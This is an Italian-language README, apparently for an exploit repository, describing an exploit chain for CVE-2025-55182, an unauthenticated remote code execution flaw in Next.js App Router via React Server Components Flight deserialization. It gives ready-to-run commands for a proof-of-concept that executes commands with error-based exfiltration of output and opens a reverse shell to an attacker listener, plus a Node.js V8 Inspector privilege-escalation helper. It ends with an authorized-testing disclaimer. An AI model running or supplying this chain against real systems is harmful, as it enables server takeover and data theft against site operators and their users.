
Exploit autonomo per CVE-2025-55182 che consente RCE non autenticata in Next.js App Router tramite deserializzazione Flight di React Server Components, con reverse shell e helper per l'escalation dei privilegi tramite Node.js V8 Inspector.
Exploit autonomo per CVE-2025-55182 nelle app Next.js App Router che abilitano i React Server Components. Payload RSC Flight appositamente costruiti inviati all'endpoint server-action consentono l'esecuzione remota di codice non autenticata. Include un helper per l'escalation dei privilegi locali Node.js V8 Inspector (debug-port) che esegue codice in un processo privilegiato tramite un bypass della sandbox process.mainModule.require.
CVE: CVE-2025-55182
python3 -m pip install requests # per i PoC Python
cdp_privesc.pypython3 cdp_privesc.py <target>
react2shell-poc.pypython3 react2shell-poc.py -t http://TARGET:3000 -c "id" # esfiltrazione comandi basata su errori
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost LHOST --lport 4444
react2shell-poc.py è il PoC pubblico di p3ta00 per CVE-2025-55182, incluso senza modifiche
da https://github.com/p3ta00/react2shell-poc per una catena autonoma.
cdp_privesc.py (il privesc locale Node.js V8 Inspector) è originale.
Solo per test di sicurezza autorizzati e scopi educativi. Eseguilo esclusivamente contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta al test.
Autore: r3vpwnx